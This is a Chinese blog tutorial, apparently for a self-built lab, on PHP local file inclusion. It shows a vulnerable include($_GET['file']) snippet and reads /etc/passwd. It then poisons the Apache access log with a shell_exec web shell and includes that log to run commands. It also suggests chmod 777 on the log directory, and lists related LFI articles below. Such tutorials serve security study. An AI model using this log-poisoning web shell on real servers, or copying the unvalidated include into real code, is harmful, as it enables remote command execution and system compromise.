PHPLocal File Include

最新推荐文章于 2022-08-06 19:39:05 发布
最新推荐文章于 2022-08-06 19:39:05 发布
阅读量244 收藏 1
点赞数
分类专栏: 网络安全 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qwrdxer/article/details/107954727
版权

PHP Local File Include漏洞

P LFI (Local file include) 利用php 的include函数 ,包含本地的恶意代码文件.

0.环境搭建

使用Apache2 +php7

1. 什么时候会出现LFI漏洞

比如当正常访问的URL中包含 类似 ?file=xxx.php的时候, 尝试修改file的值为/etc/passwd 或 者c:\windows\system32\drivers\etc\hosts 等,如果返回了对应的文件, 则这个网站就有LFI漏洞

文件包含的源码类似结构如下

<?php
    file=$_GET["file"];
	include $file;
?>

服务端根据PHP请求的参数file, 调用include函数来包含指定的文件, 如果文件中有PHP的代码,则会直接执行。

2. 如何让服务器本地有恶意代码文件

常用的方式是使用日志

当我们尝试访问服务器的时候, 会留下日志, 如下

image-20200812121700542

利用这一性质, 我们可以构造带有恶意代码的URL 进行访问

http://ip:80/<?php echo shell_exec($_GET['cmd']) ?>

此时日志中就包含了恶意代码,这行代码的意思是将请求传入的cmd参数作为命令执行, 然后使用echo打印结果

image-20200812122515523

3. 漏洞利用

使用file 执行日志文件, 并传入cmd参数

http:// ip /LFI.php?file=/var/log/httpd/access_log&cmd=ls -l

服务器端会解析出日志中包含的php代码, 该代码获取了cmd参数的值并执行

image-20200812123057247

注:

  1. apache2的日志目录 /var/log/httpd目录 好像默认是只有root有rwx权限 , 为方便实验 可以使用chmod -R 777 /var/log/httpd 。
qwrdxer
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
本地文件包含漏洞详解
发哥微课堂
06-14 2万+
0x00:漏洞定义 在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。 文件包含分为两种,一种为本地文件包含,一种为远程文件包含,此篇记录本地文件包含。本地文件包含(Local File Include),简称 LFI。 0x01:涉及函数 文件包含在 php 中,涉及到的危险函数有四个,分别是 inclu...
Remote & Local File Inclusion (RFI/LFI)-文件包含漏洞
最新发布
seanyang_的博客
10-26 333
文件包含攻击,是指攻击者利用文件包含函数的参数引入文件,而Web应用又没有对该参数进行严格的过滤,导致引入文件中的恶意脚本或代码被解析、执行,攻击者获取服务器信息,甚至获取服务器权限。在PHP开发的Web应用中,脚本、图片、文本文档等被文件包含后,都会作为PHP脚本来解析。
BUUCTF--- LFI-------本地文件包含(Local File Include)
qq_51550750的博客
01-26 455
LFI-------本地文件包含(Local File Include) http://4cb69498-b053-4219-aa61-bf26a34b2e01.node4.buuoj.cn:81/?file=/flag
PHP中 LFI Local File Include,本地文件包 漏洞
09-08 87
在allow_url_include=On就是远程文件包含了,假设这里为off,那就只能本地包含了。 1. 包含上传文件 只要目标服务器支持上传,不管是jpg,txt,gif等都可以,在其中包含一句话木马即可,这种方法很简单没什么可说的。 3. 日志包含log日志文件 日志包含,这个还是比较实用的,一般apache或者其他的日志都会比较大,而我...
本地文件包含与远程文件包含漏洞
weixin_41554088的博客
05-04 1848
总结一下 1.文件包含漏洞分两种:LFI(local file include)本地文件包含 和 RFI(remote file include)远程文件包含 2.文件包含常用到的函数:include() 和 require() 3.特性:文件包含读取文件内容后,会将其当做php执行,所以在文件包含时,后缀是什么已经不重要了 4.RFI需要满足满足三个条件:1.需要allow_url_include=On(默认为off) 2.你的木马不存在目标主机上 3.要包含的远程地址一般都是txt 这里拿ph
利用本地包含漏洞执行任意代码
cnbird's blog
01-19 2万+
1 概述   文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句就可以调用内部定义的函数。 本地包含漏洞是PHP中一种典型的高危漏洞。由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被包含的文件,成功利用时可以使web
PHP脚本中include文件出错解决方法
10-30
例如,如果你的文件位于`/var/www/project/subfolder/file.php`,你需要确保`/var/www/project`和`/var/www/project/subfolder`都有执行权限。 解决这些问题的其他策略包括: - **使用`error_reporting(E_ALL)`**...
PHP安装imagick时出现Cannot locate header file MagickWand.h错误的解决方法
12-19
ln -s /usr/local/include/ImageMagick-6 /usr/local/include/ImageMagick ``` 创建软链接后,再次执行`make`、`make install`进行编译和安装,通常就可以顺利通过了。 在处理这类问题时,确保已经正确安装了...
Laravel访问出错提示:`Warning: require(/vendor/autoload.php): failed to open stream: No such file or di解决方法
01-21
本文实例讲述了Laravel框架访问出错提示:`Warning require(vendorautoload.php) failed to open stream No such file or dire解决方法。分享给大家供大家参考,具体如下: 错误信息: `Warning: require(/...
文件包含漏洞-知识点
热门推荐
weixin_44257023的博客
08-06 4万+
文件包含漏洞-知识点,简单了解包含漏洞
文件包含的漏洞、原理、利用
m0_52556798的博客
03-28 4254
最近的总结都比较简单,但不是在水,只是在我学习过程中总结的觉得真的有用的知识,还有就是有些代码发不出来我也没办法,所以就有所调整。 文件包含原理是啥? 文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时, 就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件, 此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。 讲讲
PHP Local File Inclusion RCE with PHPINFO
weixin_38885346的博客
05-07 1000
该实验为Vulnhub上的一个漏洞环境,利用phpinfo与LFI(本地文件包含)漏洞,实现RCE。 这里用到了如下几个条件: 1.php的config配置文件里file_uploads=on则,php会接收post请求传输的文件,并临时存储在一个目录中,当该post请求处理结束后,服务端就会将该临时文件删除; 2.php需要一个LFI漏洞,方便我们去访问上传的恶意的临时文件,临时文件中写好了恶意的php脚本。 exp的实现思路: 1.以post的形式传输一个文件给phpinfo,同时在请求头中写入大量的垃
不允许php加载本地资源,php – 不允许“加载数据本地infile”命令
weixin_35531735的博客
03-18 171
我正在使用PHP mysqli库.每次我尝试运行LOAD DATA LOCAL INFILE命令时,mysqli都会对该消息抱怨The used command is not allowed with this MySQL version从MySQL终端运行命令(必须使用–local-infile = 1登录以使其正常工作)或PHPMyAdmin,我没有遇到同样的问题.只是我的PHP mysqli...
文件包含漏洞之——本地文件包含漏洞 (LFI)
wsnbbz的博客
03-04 2563
定义 能够读取或执行包含本地文件的漏洞,称为本地文件包含漏洞 源代码 原理 为了方便,include等函数里放的不是一个指定文件,而是一个接收文件的变量,从而造成用户可以控制参数file改变这个变量 当参数file 的值为一个指定路径的文件时,此时变量就是此路径,include函数就会执行此文件,当文件不是可执行的php文件时,就会将文件内容读取出货来,这样用户就可通过更改url里的参数进行读取...
PHP 例出所有加载文件
wwwer52022222的博客
03-22 379
转载来至 http://www.puwei.link/2017/03/19/55.html 这句话在PHP想看的文件里面打印 $included_files = get_included_files(); foreach ($included_files as $filename) {     echo “$filename\n”; }
本地文件包含漏洞(LFI漏洞)
weixin_30527551的博客
03-13 635
0x00 前言 本文的主要目的是分享在服务器遭受文件包含漏洞时,使用各种技术对Web服务器进行攻击的想法。我们都知道LFI漏洞允许用户通过在URL中包括一个文件。在本文中,我使用了bWAPP和DVWA两个不同的平台,其中包含文件包含漏洞的演示。通过它我以四种不同的方式执行LFI攻击。 0x01基本本地文件包含 在浏览器中输入目标IP,并在BWAPP内登录(bee:bug),现在选择bug...
php Local File Inclusion的利用方法汇总
note.txt
03-29 715
<br />看的国外的一个paper ,总结一下(截断统一不考虑):<br />1. 包含上传好的文件,jpg、txt、rar等允许的文件。<br />2. 包含各种日志。<br />3. 使用php wrapper,例如php://input、php://filter、data://等。<br />4. 包含 /proc/self/environ ,不熟悉linux,这个就靠大家了。<br />5. 包含SESSION文件,php保存格式 sess_SESSIONID  默认位置是/tmp/和c:/wi
文件包含漏洞详解
把梦想放飞在蓝色的天空里...
07-14 1万+
原文作者: m4r10 http://hi.baidu.com/m4r10 转载请注明版权 &&&远程文件包含漏洞&&& 一、 什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 涉及到的危险函数:include(),require()和incl
PHP伪协议详解:file:///与php://功能与安全设置
- **用法示例**:例如 `file:///path/to/local/file.txt` 或 `[相对路径]/file.txt`。在CLI模式下,工作目录可能根据脚本调用位置而变化,`include_path` 可能会被用来搜索文件。 - **参考文档**:`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值